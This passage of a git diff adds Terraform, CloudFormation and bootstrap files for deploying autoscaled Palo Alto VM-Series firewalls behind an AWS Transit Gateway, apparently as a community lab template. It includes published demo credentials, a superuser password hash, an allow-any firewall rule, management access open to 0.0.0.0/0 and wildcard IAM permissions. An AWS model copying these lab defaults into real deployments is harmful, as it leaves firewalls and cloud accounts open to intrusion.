+  default = "vmseries"
+}
diff --git a/aws/tgw_inbound_asg-GovCloud/outputs.tf b/aws/tgw_inbound_asg-GovCloud/outputs.tf
new file mode 100644
index 00000000..358ed0b0
--- /dev/null
+++ b/aws/tgw_inbound_asg-GovCloud/outputs.tf
@@ -0,0 +1,9 @@
+output "SQS-URL" {
+  value = "${module.fw_in.sqs_id}"
+}
+output "ELB-URL" {
+  value = "${module.fw_in.lb_dns_name}"
+}
+output "S3-BUCKET" {
+  value = "${module.s3_in.bucket_name}"
+}
\ No newline at end of file
diff --git a/aws/tgw_inbound_asg-GovCloud/variables.tf b/aws/tgw_inbound_asg-GovCloud/variables.tf
new file mode 100644
index 00000000..774ededc
--- /dev/null
+++ b/aws/tgw_inbound_asg-GovCloud/variables.tf
@@ -0,0 +1,37 @@
+provider "aws" {
+  version = ">= 1.0.0"
+  region  = "${var.region}"
+}
+
+variable tag {
+  default = "fw-in"
+}
+
+variable region {
+  default = "us-gov-west-1"
+}
+
+variable key_name {
+  description = "Enter name of an existing EC2 key pair"
+  default     = "AWS-Lab-Pair"
+}
+
+variable fw_ami {
+  description = "FW AMI - https://docs.paloaltonetworks.com/compatibility-matrix/vm-series-firewalls/aws-cft-amazon-machine-images-ami-list/images-for-pan-os-8-1.html"
+  default     = "ami-09553d68"
+}
+
+variable fw_sg_source {
+  description = "Source prefix to apply to mgmt ENI"
+  default     = "0.0.0.0/0"
+}
+
+variable tgw_id {
+  description = "Enter the ID of an existing TGW"
+  default     = "tgw-0123456789"
+}
+
+variable tgw_rtb_id {
+  description = "Enter the ID of an existing TGW route table to associate with VPC attachment"
+  default     = "tgw-rtb-0123456789"
+}
\ No newline at end of file
diff --git a/aws/tgw_inbound_asg/README.md b/aws/tgw_inbound_asg/README.md
new file mode 100644
index 00000000..048fc3de
--- /dev/null
+++ b/aws/tgw_inbound_asg/README.md
@@ -0,0 +1,36 @@
+## VM-Series Autoscaling for Inbound TGW
+This build is an adaptation of the [AWS VM-Series Autoscaling 2.0](https://docs.paloaltonetworks.com/vm-series/8-1/vm-series-deployment/set-up-the-vm-series-firewall-on-aws/auto-scale-vm-series-firewalls-with-the-amazon-elb/autoscale-template-version2_0.html) to work function with AWS Transit Gateway.
+
+### Overview
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/aws/tgw_inbound_asg/diagram.png">
+</p>
+
+### Requirements
+* Existing Transit Gateway
+* Existing Transit Gateway route table for the Security-VPC attachment
+* EC2 Key Pair for deployment region
+* UN/PW: **pandemo** / **demopassword**
+
+
+### How to Deploy
+1.  Open **variables.tf** in a text editor. 
+2.  Uncomment default values and add correct value for following variables: 
+    * **fw_ami**
+         * Firewall AMI for AWS Region, SKU, & PAN-OS version.
+    * **fw_sg_source**
+         * Source prefix to apply to VM-Series mgmt. interface
+    * **tgw_id** 
+         * Existing Transit Gateway ID
+    * **tgw_rtb_id** 
+         * Existing Transit Gateway Route Table ID
+3.  Save **variables.tf**
+4.  BYOL ONLY 
+    * If you want to license the VM-Series on creation, copy and paste your Auth Code into the /bootstrap/authcodes file.  The Auth Code must be registered with your Palo Alto Networks support account before proceeding.
+Before proceeding, make sure you have accepted and subscribed to the VM-Series software in the AWS Marketplace. 
+
+
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/aws/tgw_inbound_asg/bootstrap_files/authcodes b/aws/tgw_inbound_asg/bootstrap_files/authcodes
new file mode 100644
index 00000000..8d1c8b69
--- /dev/null
+++ b/aws/tgw_inbound_asg/bootstrap_files/authcodes
@@ -0,0 +1 @@
+ 
diff --git a/aws/tgw_inbound_asg/bootstrap_files/bootstrap.xml b/aws/tgw_inbound_asg/bootstrap_files/bootstrap.xml
new file mode 100644
index 00000000..e0db5fed
--- /dev/null
+++ b/aws/tgw_inbound_asg/bootstrap_files/bootstrap.xml
@@ -0,0 +1,439 @@
+<?xml version="1.0"?>
+<config urldb="paloaltonetworks" version="8.1.0">
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>*****</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcG9tWXUwNjNjQ2ViamNpd2R3czRyNjluUWNDcXoyQkkvMHR4WjA4RElzQkw3WFNqUmlSRCtvU3pDN1E4bTFOZ1dFcTN5ajRJTlI4Sm01WnZjcDJpRmVCbWdXTmZWc2hFQ1FwU2lMTmJXMFE5L05NRkNiZG9WandRUFhhRmhHTFQ1M2RiR3BzUFc4bE44NnRJam01cCsrYlR5T2tuUzFSUlJMWnNoYjZpSXRxbXZoRVdNRnZ4NG1CdnVxTHVqSHRaN1JhSksveTAxUkxGMXZCRE1aN01mbnVObGgwVXM1cTIwT2k0NjlLNzBrbi81bnF4YzZIWGpPRnRiYUZtUnhwK0FXbGs0a0x4YTdrTE0wNjMxRUgyUlZzY1Q5Q2kzYURVK2JPKzI0dzRGK2Y5U05NeFQzOW1TeFpmWXlMWHlqSGdWeE93QjZuRW5IUUcxSjdCRldHa1QgbXJtLWVhc3R1czEta2V5</public-key>
+      </entry>
+      <entry name="pandemo">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$hqikhfkl$1Z1t7bvONQJM1IAh0erho1</phash>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <interface-management-profile>mgmt</interface-management-profile>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <dhcp-client/>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <interface-management-profile>mgmt</interface-management-profile>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <dhcp-client/>
+              </layer3>
+            </entry>
+          </ethernet>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+          <interface-management-profile>
+            <entry name="mgmt">
+              <ssh>yes</ssh>
+              <ping>yes</ping>
+            </entry>
+          </interface-management-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="default">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+              </bgp>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>ethernet1/2</member>
+            </interface>
+          </entry>
+        </virtual-router>
+      </network>
+      <deviceconfig>
+        <system>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>no</send-client-id>
+              <accept-dhcp-hostname>no</accept-dhcp-hostname>
+              <accept-dhcp-domain>no</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <ip-address>192.168.10.16</ip-address>
+          <netmask>255.255.255.0</netmask>
+          <default-gateway>192.168.10.1</default-gateway>
+          <hostname>PA-VM</hostname>
+          <server-verification>no</server-verification>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>no</send-client-id>
+                  <accept-dhcp-hostname>no</accept-dhcp-hostname>
+                  <accept-dhcp-domain>no</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcG9tWXUwNjNjQ2ViamNpd2R3czRyNjluUWNDcXoyQkkvMHR4WjA4RElzQkw3WFNqUmlSRCtvU3pDN1E4bTFOZ1dFcTN5ajRJTlI4Sm01WnZjcDJpRmVCbWdXTmZWc2hFQ1FwU2lMTmJXMFE5L05NRkNiZG9WandRUFhhRmhHTFQ1M2RiR3BzUFc4bE44NnRJam01cCsrYlR5T2tuUzFSUlJMWnNoYjZpSXRxbXZoRVdNRnZ4NG1CdnVxTHVqSHRaN1JhSksveTAxUkxGMXZCRE1aN01mbnVObGgwVXM1cTIwT2k0NjlLNzBrbi81bnF4YzZIWGpPRnRiYUZtUnhwK0FXbGs0a0x4YTdrTE0wNjMxRUgyUlZzY1Q5Q2kzYURVK2JPKzI0dzRGK2Y5U05NeFQzOW1TeFpmWXlMWHlqSGdWeE93QjZuRW5IUUcxSjdCRldHa1QgbXJtLWVhc3R1czEta2V5</public-key>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+          <aws-cloudwatch>
+            <enabled>yes</enabled>
+            <name>security-i-secur-Publi-MBTK5R0EMJSF_ASG_us-east-1a</name>
+          </aws-cloudwatch>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="Untrust">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                </layer3>
+              </network>
+            </entry>
+            <entry name="Trust">
+              <network>
+                <layer3>
+                  <member>ethernet1/2</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service/>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="policy1">
+                  <to>
+                    <member>any</member>
+                  </to>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+              </rules>
+            </security>
+            <nat>
+              <rules/>
+            </nat>
+          </rulebase>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>ethernet1/2</member>
+              </interface>
+            </network>
+          </import>
+          <address>
+            <entry name="AWS-NAT-UNTRUST">
+              <ip-netmask>10.255.1.4</ip-netmask>
+              <description>UNTRUST-IP-address</description>
+            </entry>
+          </address>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/aws/tgw_inbound_asg/bootstrap_files/init-cfg.txt b/aws/tgw_inbound_asg/bootstrap_files/init-cfg.txt
new file mode 100644
index 00000000..c77f637b
--- /dev/null
+++ b/aws/tgw_inbound_asg/bootstrap_files/init-cfg.txt
@@ -0,0 +1,10 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+dhcp-accept-server-hostname=yes
+dns-primary=8.8.8.8
+dns-secondary=4.2.2.2
+op-command-modes=mgmt-interface-swap
diff --git a/aws/tgw_inbound_asg/bootstrap_files/nlb.zip b/aws/tgw_inbound_asg/bootstrap_files/nlb.zip
new file mode 100644
index 00000000..066e08bc
Binary files /dev/null and b/aws/tgw_inbound_asg/bootstrap_files/nlb.zip differ
diff --git a/aws/tgw_inbound_asg/bootstrap_files/pan_nlb_lambda.template b/aws/tgw_inbound_asg/bootstrap_files/pan_nlb_lambda.template
new file mode 100644
index 00000000..5d0b96fd
--- /dev/null
+++ b/aws/tgw_inbound_asg/bootstrap_files/pan_nlb_lambda.template
@@ -0,0 +1,486 @@
+{
+  "AWSTemplateFormatVersion" : "2010-09-09",
+  "Description" : "Creates an AWS Network Load balancer, which multiplexes traffic to registered scaled out back end web servers",
+  "Parameters": {
+    "NLBName": {
+      "Type" : "String",
+      "Description": "Enter the name of the NLB",
+      "Default": "prot-nlb",
+      "MinLength" : "3",
+      "MaxLength" : "120"
+    },
+    "NLBARN": {
+      "Type" : "String",
+      "Description": "Enter the ARN of the NLB",
+      "Default": "prot-nlb",
+      "MinLength" : "3",
+      "MaxLength" : "150"
+    },
+    "QueueURL": {
+      "Type" : "String",
+      "Description": "Enter the URL of the Queue to send messages to",
+      "MinLength" : "3",
+      "MaxLength" : "1024"
+    },
+    "TableName": {
+      "Type" : "String",
+      "Default": "nlb_db_tbl",
+      "Description": "Enter the name of the database table",
+      "MinLength" : "3",
+      "MaxLength" : "120"
+    },
+    "S3BucketName": {
+      "Type" : "String",
+      "Description": "Enter the name of the S3 Bucket which contains the lambda code",
+      "MinLength" : "3",
+      "MaxLength" : "120"
+    },
+    "S3ObjectName": {
+      "Type" : "String",
+      "Default": "nlb.zip",
+      "Description": "Enter the name of the S3 object which contains the lambda code",
+      "MinLength" : "3",
+      "MaxLength" : "120"
+    },
+    "RoleARN": {
+      "Type": "String",
+      "Default": "",
+      "Description": "The ARN of the role to use for Cross Account Access",
+      "MaxLength" : "120"
+    },
+    "ExternalId": {
+      "Type": "String",
+      "Default": "",
+      "Description": "The external ID associated with the Cross Account Role",
+      "MaxLength" : "120"
+    },
+    "SameAccount": {
+      "Type": "String",
+      "Default": "true",
+      "Description": "Flag to indicate if the NLB will be deployed into the same account or a different one",
+      "AllowedValues": [
+        "true",
+        "false"
+      ]
+    }
+  },
+  "Metadata" : {
+    "AWS::CloudFormation::Interface" : {
+        "ParameterLabels" : {
+            "NLB ARN": {"Ref": "NLBARN"},
+            "NLB Name": {"Ref": "NLBNAME"},
+            "Queue URL": {"Ref": "QueueURL"},
+            "Table Name": {"Ref": "TableName"},
+            "Lambda S3 Bucket Name": {"Ref": "S3BucketName"},
+            "Lambda S3 Object Name": {"Ref": "S3ObjectName"}
+      }
+    }
+  },
+  "Conditions": {
+    "CreateCrossAccountRole": {"Fn::Equals" : [{"Ref": "SameAccount"}, "false"] },
+    "NoCrossAccountRole": {"Fn::Equals" : [{"Ref": "SameAccount"}, "true"] }
+  },
+  "Resources": {
+    "LambdaExecutionRole0" : {
+        "Type": "AWS::IAM::Role",
+        "Condition": "NoCrossAccountRole",
+        "Properties": {
+            "AssumeRolePolicyDocument": {
+               "Version": "2012-10-17",
+               "Statement": [ {
+                 "Effect": "Allow",
+                 "Principal": {
+                    "Service": "lambda.amazonaws.com"
+                },
+                "Action": "sts:AssumeRole"
+              } ]
+            },
+            "Path":"/",
+            "Policies": [ {
+              "PolicyName": "LambdaExecutionRolePolicy",
+              "PolicyDocument":{
+                "Version": "2012-10-17",
+                "Statement": [
+                {
+                    "Effect": "Allow",
+                    "Action": "s3:ListBucket",
+                    "Resource": { "Fn::Join": [ "", [ "arn:aws:s3:::", {"Ref": "S3BucketName" }, "/*" ] ] }
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": "s3:GetObject",
+                    "Resource": { "Fn::Join": [ "", [ "arn:aws:s3:::", { "Ref": "S3BucketName" }, "/*" ] ] }
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "ec2:DescribeSubnets"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "events:*"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "cloudwatch:*"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "lambda:AddPermission",
+                        "lambda:CreateEventSourceMapping",
+                        "lambda:CreateFunction",
+                        "lambda:DeleteEventSourceMapping",
+                        "lambda:DeleteFunction",
+                        "lambda:GetEventSourceMapping",
+                        "lambda:ListEventSourceMappings",
+                        "lambda:RemovePermission",
+                        "lambda:UpdateEventSourceMapping",
+                        "lambda:UpdateFunctionCode",
+                        "lambda:UpdateFunctionConfiguration",
+                        "lambda:GetFunction",
+                        "lambda:ListFunctions"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "sqs:ReceiveMessage",
+                        "sqs:SendMessage",
+                        "sqs:SetQueueAttributes",
+                        "sqs:PurgeQueue"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "elasticloadbalancing:AddTags",
+                        "elasticloadbalancing:AttachLoadBalancerToSubnets",
+                        "elasticloadbalancing:ConfigureHealthCheck",
+                        "elasticloadbalancing:DescribeInstanceHealth",
+                        "elasticloadbalancing:DescribeLoadBalancerAttributes",
+                        "elasticloadbalancing:DescribeLoadBalancerPolicyTypes",
+                        "elasticloadbalancing:DescribeLoadBalancerPolicies",
+                        "elasticloadbalancing:DescribeLoadBalancers",
+                        "elasticloadbalancing:DescribeTags",
+                        "elasticloadbalancing:DetachLoadBalancerFromSubnets",
+                        "elasticloadbalancing:ModifyLoadBalancerAttributes",
+                        "elasticloadbalancing:RemoveTags"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "iam:PassRole",
+                        "iam:GetRole"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                  "Effect": "Allow",
+                  "Action": ["logs:CreateLogGroup","logs:CreateLogStream","logs:PutLogEvents"],
+                  "Resource": "arn:aws:logs:*:*:*"
+                },
+                {
+                  "Effect": "Allow",
+                  "Action": ["cloudformation:DescribeStacks"],
+                  "Resource": "*"
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "logs:CreateLogGroup",
+                        "logs:CreateLogStream",
+                        "logs:PutDestination",
+                        "logs:PutDestinationPolicy",
+                        "logs:PutLogEvents",
+                        "logs:PutMetricFilter"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "dynamodb:CreateTable",
+                        "dynamodb:DeleteItem",
+                        "dynamodb:DeleteTable",
+                        "dynamodb:GetItem",
+                        "dynamodb:PutItem"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                }
+                ]
+              }}]}
+    },
+    "LambdaExecutionRole1" : {
+        "Type": "AWS::IAM::Role",
+        "Condition": "CreateCrossAccountRole",
+        "Properties": {
+            "AssumeRolePolicyDocument": {
+               "Version": "2012-10-17",
+               "Statement": [ {
+                 "Effect": "Allow",
+                 "Principal": {
+                    "Service": "lambda.amazonaws.com"
+                },
+                "Action": "sts:AssumeRole"
+              } ]
+            },
+            "Path":"/",
+            "Policies": [ {
+              "PolicyName": "LambdaExecutionRolePolicy",
+              "PolicyDocument":{
+                "Version": "2012-10-17",
+                "Statement": [
+                {
+                    "Effect": "Allow",
+                    "Action": "sts:AssumeRole",
+                    "Resource": {"Ref": "RoleARN"}
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": "s3:ListBucket",
+                    "Resource": { "Fn::Join": [ "", [ "arn:aws:s3:::", {"Ref": "S3BucketName" }, "/*" ] ] }
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": "s3:GetObject",
+                    "Resource": { "Fn::Join": [ "", [ "arn:aws:s3:::", { "Ref": "S3BucketName" }, "/*" ] ] }
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "ec2:DescribeSubnets"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "events:*"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "cloudwatch:*"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "lambda:AddPermission",
+                        "lambda:CreateEventSourceMapping",
+                        "lambda:CreateFunction",
+                        "lambda:DeleteEventSourceMapping",
+                        "lambda:DeleteFunction",
+                        "lambda:GetEventSourceMapping",
+                        "lambda:ListEventSourceMappings",
+                        "lambda:RemovePermission",
+                        "lambda:UpdateEventSourceMapping",
+                        "lambda:UpdateFunctionCode",
+                        "lambda:UpdateFunctionConfiguration",
+                        "lambda:GetFunction",
+                        "lambda:ListFunctions"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "sqs:ReceiveMessage",
+                        "sqs:SendMessage",
+                        "sqs:SetQueueAttributes",
+                        "sqs:PurgeQueue"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "elasticloadbalancing:AddTags",
+                        "elasticloadbalancing:AttachLoadBalancerToSubnets",
+                        "elasticloadbalancing:ConfigureHealthCheck",
+                        "elasticloadbalancing:DescribeInstanceHealth",
+                        "elasticloadbalancing:DescribeLoadBalancerAttributes",
+                        "elasticloadbalancing:DescribeLoadBalancerPolicyTypes",
+                        "elasticloadbalancing:DescribeLoadBalancerPolicies",
+                        "elasticloadbalancing:DescribeLoadBalancers",
+                        "elasticloadbalancing:DescribeTags",
+                        "elasticloadbalancing:DetachLoadBalancerFromSubnets",
+                        "elasticloadbalancing:ModifyLoadBalancerAttributes",
+                        "elasticloadbalancing:RemoveTags"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "iam:PassRole",
+                        "iam:GetRole"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                  "Effect": "Allow",
+                  "Action": ["logs:CreateLogGroup","logs:CreateLogStream","logs:PutLogEvents"],
+                  "Resource": "arn:aws:logs:*:*:*"
+                },
+                {
+                  "Effect": "Allow",
+                  "Action": ["cloudformation:DescribeStacks"],
+                  "Resource": "*"
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "logs:CreateLogGroup",
+                        "logs:CreateLogStream",
+                        "logs:PutDestination",
+                        "logs:PutDestinationPolicy",
+                        "logs:PutLogEvents",
+                        "logs:PutMetricFilter"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                },
+                {
+                    "Effect": "Allow",
+                    "Action": [
+                        "dynamodb:CreateTable",
+                        "dynamodb:DeleteItem",
+                        "dynamodb:DeleteTable",
+                        "dynamodb:GetItem",
+                        "dynamodb:PutItem"
+                    ],
+                    "Resource": [
+                        "*"
+                    ]
+                }
+                ]
+              }}]}
+    },
+    "NLBDeployerLambda0" : {
+        "Type": "AWS::Lambda::Function",
+        "Condition": "NoCrossAccountRole",
+        "Properties": {
+            "Handler": "nlb_deployer.nlb_deploy_handler",
+            "Role": {"Fn::GetAtt" :
+                      ["LambdaExecutionRole0",
+                        "Arn"
+                      ]
+            },
+            "Code": {
+                "S3Bucket": { "Ref": "S3BucketName"},
+                "S3Key": { "Ref": "S3ObjectName"}
+            },
+        "Runtime": "python2.7",
+        "Timeout": "300"
+      }
+    },
+    "NLBDeployerLambda1" : {
+        "Type": "AWS::Lambda::Function",
+        "Condition": "CreateCrossAccountRole",
+        "Properties": {
+            "Handler": "nlb_deployer.nlb_deploy_handler",
+            "Role": {"Fn::GetAtt" :
+                      ["LambdaExecutionRole1",
+                        "Arn"
+                      ]
+            },
+            "Code": {
+                "S3Bucket": { "Ref": "S3BucketName"},
+                "S3Key": { "Ref": "S3ObjectName"}
+            },
+        "Runtime": "python2.7",
+        "Timeout": "300"
+      }
+    },
+    "LambdaCustomResource0": {
+        "Type": "AWS::CloudFormation::CustomResource",
+        "Condition": "NoCrossAccountRole",
+        "Version" : "1.0",
+        "DependsOn": ["NLBDeployerLambda0"],
+         "Properties" : {
+             "ServiceToken": { "Fn::GetAtt" : ["NLBDeployerLambda0", "Arn"] },
+             "StackName": {"Ref": "AWS::StackName"},
+             "Region": {"Ref": "AWS::Region"},
+             "table_name": {"Ref": "TableName"},
+             "NLB-ARN": {"Ref": "NLBARN"},
+             "NLB-NAME": {"Ref": "NLBName"},
